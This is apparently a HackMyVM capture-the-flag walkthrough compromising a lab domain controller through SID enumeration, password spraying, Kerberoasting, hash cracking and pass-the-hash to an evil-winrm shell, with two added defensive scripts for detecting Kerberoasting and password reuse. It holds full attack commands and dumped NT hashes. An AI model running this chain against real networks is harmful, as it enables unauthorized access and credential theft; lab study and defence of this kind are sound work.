hackmyvm-dc01
// Host discovery
nmap -sP 192.168.5.0/24
// Scan all TCP ports on the host
nmap -sT --min-rate 10000 -p- 192.168.5.75
Starting Nmap 7.95 ( https://nmap.org ) at 2025-11-25 21:39 EST
Nmap scan report for 192.168.5.75 (192.168.5.75)
Host is up (0.0042s latency).
Not shown: 65517 filtered tcp ports (no-response)
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
5985/tcp open wsman
9389/tcp open adws
49664/tcp open unknown
49668/tcp open unknown
49671/tcp open unknown
49691/tcp open unknown
49754/tcp open unknown
MAC Address: 08:00:27:0B:87:1F (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
// Service version and OS detection
nmap -sT -sV -O -p- 192.168.5.75
Nmap scan report for 192.168.5.75 (192.168.5.75)
Host is up (0.00081s latency).
Not shown: 65517 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-11-26 18:52:08Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: SOUPEDECODE.LOCAL0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: SOUPEDECODE.LOCAL0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
9389/tcp open mc-nmf .NET Message Framing
49664/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49671/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49691/tcp open msrpc Microsoft Windows RPC
49754/tcp open msrpc Microsoft Windows RPC
MAC Address: 08:00:27:0B:87:1F (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2022|11|2016 (97%)
OS CPE: cpe:/o:microsoft:windows_server_2022 cpe:/o:microsoft:windows_11 cpe:/o:microsoft:windows_server_2016
Aggressive OS guesses: Microsoft Windows Server 2022 (97%), Microsoft Windows 11 21H2 (91%), Microsoft Windows Server 2016 (91%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 172.05 seconds
DNS, LDAP and SMB are all exposed (a typical domain controller). Try SMB first.
Run an anonymous SMB share enumeration.
smbmap -H 192.168.5.75 -u anonymous
________ ___ ___ _______ ___ ___ __ _______
/" )|" \ /" || _ "\ |" \ /" | /""\ | __ "\
(: \___/ \ \ // |(. |_) :) \ \ // | / \ (. |__) :)
\___ \ /\ \/. ||: \/ /\ \/. | /' /\ \ |: ____/
__/ \ |: \. |(| _ \ |: \. | // __' \ (| /
/" \ :) |. \ /: ||: |_) :)|. \ /: | / / \ \ /|__/ \
(_______/ |___|\__/|___|(_______/ |___|\__/|___|(___/ \___)(_______)
-----------------------------------------------------------------------------
SMBMap - Samba Share Enumerator v1.10.7 | Shawn Evans - ShawnDEvans@gmail.com
https://github.com/ShawnDEvans/smbmap
[*] Detected 1 hosts serving SMB
[*] Established 1 SMB connections(s) and 0 authenticated session(s)
[+] IP: 192.168.5.75:445 Name: 192.168.5.75 Status: Authenticated
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
backup NO ACCESS
C$ NO ACCESS Default share
IPC$ READ ONLY Remote IPC
NETLOGON NO ACCESS Logon server share
SYSVOL NO ACCESS Logon server share
Users NO ACCESS
Only IPC$ is readable.
smbclient //192.168.5.75/IPC$
Password for [WORKGROUP\kali]:
Try "help" to get a list of possible commands.
smb: \> ls
NT_STATUS_NO_SUCH_FILE listing \*
Since IPC$ accepts an anonymous session, domain users can be enumerated with lookupsid.py from the impacket package.
// User enumeration; the nmap output reports the domain as SOUPEDECODE.LOCAL0. (later tool output shows the real name is SOUPEDECODE.LOCAL)
python3 /usr/share/doc/python3-impacket/examples/lookupsid.py SOUPEDECODE.LOCAL0./anonymous@192.168.5.75 > users.txt
// Post-processing: keep only the username, i.e. strip the "SOUPEDECODE\" prefix (12 characters) from the second field of each lookupsid line
cat users.txt | awk '{print substr($2, 13)}' > username.txt
Try a login brute force, pairing each username with itself as the password.
netexec smb 192.168.5.75 -u username.txt -p username.txt --continue-on-success --no-bruteforce | grep '+' | grep -v '(Guest)'
SMB 192.168.5.75 445 DC01 [+] SOUPEDECODE.LOCAL\ybob317:ybob317
One valid credential pair found; connect with smbclient.
smbclient //192.168.5.75/Users -U ybob317%ybob317
smb: \ybob317\Desktop\> get user.txt
The user flag is on the desktop: userflag{6bab1f09a7403980bfeb4c2b412be47b}
Now for privilege escalation.
The nmap results show port 88 open, which is the Kerberos authentication service.
Kerberoasting: when a user presents a valid TGT, the KDC returns a service ticket (TGS) for the requested service, and that ticket is encrypted with the service account's password hash. So with any domain user account we can request service tickets for SPN-bearing service accounts and brute-force the hash offline to recover the service account's password; this process is called Kerberoasting. In a domain, a service is uniquely identified by its SPN.
In essence it is cracking the TGS ticket, since the TGS is encrypted with the service account's hash.
First enumerate the accounts with SPNs and request their tickets.
python3 /usr/share/doc/python3-impacket/examples/GetUserSPNs.py SOUPEDECODE.LOCAL/ybob317:ybob317 -dc-ip 192.168.5.75 -request
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
---------------------- -------------- -------- -------------------------- --------- ----------
FTP/FileServer file_svc 2024-06-17 13:32:23.726085 <never>
FW/ProxyServer firewall_svc 2024-06-17 13:28:32.710125 <never>
HTTP/BackupServer backup_svc 2024-06-17 13:28:49.476511 <never>
HTTP/WebServer web_svc 2024-06-17 13:29:04.569417 <never>
HTTPS/MonitoringServer monitoring_svc 2024-06-17 13:29:18.511871 <never>
[-] CCache file is not found. Skipping...
[-] Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)
The Kali machine's clock is out of sync with the target (Kerberos rejects requests with too much clock skew), so adjust Kali's time.
First disable local automatic time synchronisation.
sudo systemctl stop systemd-timesyncd
sudo systemctl disable systemd-timesyncd
Sync the time to the DC.
sudo rdate -n 192.168.5.75
sudo python3 get_dc_time.py -t smb -s 192.168.5.75
// Two ways to do it; the second is B神's get_dc_time.py script, which gives wrong results unless the options are specified explicitly
Request the tickets again.
python3 /usr/share/doc/python3-impacket/examples/GetUserSPNs.py SOUPEDECODE.LOCAL/ybob317:ybob317 -dc-ip 192.168.5.75 -request
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
---------------------- -------------- -------- -------------------------- --------- ----------
FTP/FileServer file_svc 2024-06-17 13:32:23.726085 <never>
FW/ProxyServer firewall_svc 2024-06-17 13:28:32.710125 <never>
HTTP/BackupServer backup_svc 2024-06-17 13:28:49.476511 <never>
HTTP/WebServer web_svc 2024-06-17 13:29:04.569417 <never>
HTTPS/MonitoringServer monitoring_svc 2024-06-17 13:29:18.511871 <never>
[-] CCache file is not found. Skipping...
Crack the returned TGS hashes with hashcat (mode 13100, Kerberos 5 TGS-REP etype 23).
hashcat.exe -m 13100 1.txt dic.txt
This recovers file_svc's password: Password123!!
Password-spray it to see which accounts accept this password.
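The detection side of the Kerberoasting step above, as an added example that is not part of the original walkthrough: a burst of service-ticket requests for several SPNs using RC4 (etype 0x17, the ticket type hashcat mode 13100 cracks) appears in the DC's Security log as Event ID 4769 records. The records below are constructed and simplified; the field names are assumptions (the real event carries the account name with realm and a Ticket Encryption Type field).

```python
"""Flag Kerberoasting-style bursts of RC4 TGS requests in Event ID 4769 data.
Added illustration; event records are constructed and simplified."""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed 4769 records: one account behaving like the GetUserSPNs.py
# -request run on this page (five SPNs, RC4, within seconds), one normal
# user using AES (0x12), and one computer account.
EVENTS = [
    {"ts": "2025-11-26T18:52:10", "user": "ybob317", "spn": "FTP/FileServer", "etype": "0x17"},
    {"ts": "2025-11-26T18:52:10", "user": "ybob317", "spn": "FW/ProxyServer", "etype": "0x17"},
    {"ts": "2025-11-26T18:52:11", "user": "ybob317", "spn": "HTTP/BackupServer", "etype": "0x17"},
    {"ts": "2025-11-26T18:52:11", "user": "ybob317", "spn": "HTTP/WebServer", "etype": "0x17"},
    {"ts": "2025-11-26T18:52:11", "user": "ybob317", "spn": "HTTPS/MonitoringServer", "etype": "0x17"},
    {"ts": "2025-11-26T18:55:00", "user": "jdoe", "spn": "HTTP/WebServer", "etype": "0x12"},
    {"ts": "2025-11-26T19:10:00", "user": "jdoe", "spn": "cifs/DC01", "etype": "0x12"},
    {"ts": "2025-11-26T18:52:12", "user": "DC01$", "spn": "ldap/DC01", "etype": "0x17"},
]

RC4_ETYPE = "0x17"  # RC4-HMAC; what $krb5tgs$23$ / hashcat 13100 hashes come from


def kerberoast_suspects(events, window=timedelta(minutes=5), min_spns=3):
    """Return {user: sorted SPNs} for accounts that requested RC4 service
    tickets for at least `min_spns` distinct SPNs within `window`.
    Computer accounts (trailing $) and krbtgt are skipped as expected noise."""
    per_user = defaultdict(list)
    for e in events:
        if e["etype"] != RC4_ETYPE or e["user"].endswith("$") or e["user"].lower() == "krbtgt":
            continue
        per_user[e["user"]].append((datetime.fromisoformat(e["ts"]), e["spn"]))
    suspects = {}
    for user, reqs in per_user.items():
        reqs.sort()
        # Sliding window over the time-ordered requests of this user.
        for i, (t0, _) in enumerate(reqs):
            spns = {spn for t, spn in reqs[i:] if t - t0 <= window}
            if len(spns) >= min_spns:
                suspects[user] = sorted(spns)
                break
    return suspects


if __name__ == "__main__":
    for user, spns in kerberoast_suspects(EVENTS).items():
        print(f"possible Kerberoasting by {user}: {len(spns)} SPNs {spns}")
```

Tuning: raising `min_spns` or shortening `window` trades false positives for missed slow requests; moving service accounts to AES-only keys removes the RC4 signal and the weak cracking target at once.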
netexec smb 192.168.5.75 -u username.txt -p 'Password123!!' --continue-on-success --no-bruteforce | grep '+' | grep -v '(Guest)'
SMB 192.168.5.75 445 DC01 [+] SOUPEDECODE.LOCAL\file_svc:Password123!!
Apparently only file_svc uses this password.
smbmap -H 192.168.5.75 -u file_svc -p 'Password123!!' -d SOUPEDECODE.LOCAL
[*] Detected 1 hosts serving SMB
[*] Established 1 SMB connections(s) and 1 authenticated session(s)
[+] IP: 192.168.5.75:445 Name: 192.168.5.75 Status: Authenticated
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
backup READ ONLY
C$ NO ACCESS Default share
IPC$ READ ONLY Remote IPC
NETLOGON READ ONLY Logon server share
SYSVOL READ ONLY Logon server share
Users NO ACCESS
[*] Closed 1 connections
Look at the backup share.
smbclient //192.168.5.75/backup -U SOUPEDECODE.LOCAL/file_svc%'Password123!!'
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Mon Jun 17 13:41:17 2024
.. DR 0 Mon Jun 17 13:44:56 2024
backup_extract.txt A 892 Mon Jun 17 04:41:05 2024
12942591 blocks of size 4096. 10919470 blocks available
It contains hashes of several machine accounts (pwdump format: account:RID:LM hash:NT hash:::).
cat backup_extract.txt
WebServer$:2119:aad3b435b51404eeaad3b435b51404ee:c47b45f5d4df5a494bd19f13e14f7902:::
DatabaseServer$:2120:aad3b435b51404eeaad3b435b51404ee:406b424c7b483a42458bf6f545c936f7:::
CitrixServer$:2122:aad3b435b51404eeaad3b435b51404ee:48fc7eca9af236d7849273990f6c5117:::
FileServer$:2065:aad3b435b51404eeaad3b435b51404ee:e41da7e79a4c76dbd9cf79d1cb325559:::
MailServer$:2124:aad3b435b51404eeaad3b435b51404ee:46a4655f18def136b3bfab7b0b4e70e3:::
BackupServer$:2125:aad3b435b51404eeaad3b435b51404ee:46a4655f18def136b3bfab7b0b4e70e3:::
ApplicationServer$:2126:aad3b435b51404eeaad3b435b51404ee:8cd90ac6cba6dde9d8038b068c17e9f5:::
PrintServer$:2127:aad3b435b51404eeaad3b435b51404ee:b8a38c432ac59ed00b2a373f4f050d28:::
ProxyServer$:2128:aad3b435b51404eeaad3b435b51404ee:4e3f0bb3e5b6e3e662611b1a87988881:::
MonitoringServer$:2129:aad3b435b51404eeaad3b435b51404ee:48fc7eca9af236d7849273990f6c5117:::
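A credential-hygiene check over the dump above, as an added example (not part of the original walkthrough): a pwdump parser that flags NT hashes shared by several accounts (identical passwords) and the NT hash of the empty password. The sample takes a few lines from the page's backup_extract.txt plus one constructed account; note that on the page MailServer$/BackupServer$ and CitrixServer$/MonitoringServer$ already share NT hashes, which the walkthrough does not point out.

```python
"""Audit pwdump-style lines (user:rid:lm:nt:::) for password reuse and
empty passwords. Added illustration; sample input partly from the page,
partly constructed."""
from collections import defaultdict

EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"  # LM hash when no LM hash is stored
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"  # NT hash of the empty string

# Five lines from the page's backup_extract.txt plus one constructed account
# (svc_constructed) that has an empty password.
SAMPLE_DUMP = """\
FileServer$:2065:aad3b435b51404eeaad3b435b51404ee:e41da7e79a4c76dbd9cf79d1cb325559:::
MailServer$:2124:aad3b435b51404eeaad3b435b51404ee:46a4655f18def136b3bfab7b0b4e70e3:::
BackupServer$:2125:aad3b435b51404eeaad3b435b51404ee:46a4655f18def136b3bfab7b0b4e70e3:::
CitrixServer$:2122:aad3b435b51404eeaad3b435b51404ee:48fc7eca9af236d7849273990f6c5117:::
MonitoringServer$:2129:aad3b435b51404eeaad3b435b51404ee:48fc7eca9af236d7849273990f6c5117:::
svc_constructed:9999:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
"""


def parse_pwdump(text):
    """Yield (account, rid, lm_hash, nt_hash); blank and '#' lines are skipped."""
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split(":")
        if len(parts) < 4:
            raise ValueError(f"malformed pwdump line: {line!r}")
        yield parts[0], int(parts[1]), parts[2].lower(), parts[3].lower()


def audit_pwdump(text):
    """Return {'reused': {nt_hash: [accounts]}, 'empty_nt': [...], 'lm_present': [...]}."""
    by_nt = defaultdict(list)
    empty_nt, lm_present = [], []
    for account, _rid, lm, nt in parse_pwdump(text):
        by_nt[nt].append(account)
        if nt == EMPTY_NT:
            empty_nt.append(account)
        if lm != EMPTY_LM:
            lm_present.append(account)  # a real LM hash is stored: legacy, weak
    reused = {nt: accts for nt, accts in by_nt.items() if len(accts) > 1}
    return {"reused": reused, "empty_nt": empty_nt, "lm_present": lm_present}


if __name__ == "__main__":
    for nt, accts in audit_pwdump(SAMPLE_DUMP)["reused"].items():
        print(f"NT hash {nt} shared by {', '.join(accts)}")
```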
Try pass-the-hash: usernames.txt holds the account names from backup_extract.txt and ntlm.txt their NT hashes.
netexec smb 192.168.5.75 -u usernames.txt -H ntlm.txt | grep '+'
SMB 192.168.5.75 445 DC01 [+] SOUPEDECODE.LOCAL\FileServer$:e41da7e79a4c76dbd9cf79d1cb325559 (Pwn3d!)
Get a shell with evil-winrm (netexec's "Pwn3d!" means FileServer$ has administrative rights on DC01).
evil-winrm -i 192.168.5.75 -u 'FileServer$' -H 'e41da7e79a4c76dbd9cf79d1cb325559'
*Evil-WinRM* PS C:\Users\administrator\Desktop> type root.txt
a9564ebc3289b7a14551baf8ad5ec60a
Hardship and struggle are what forge success.
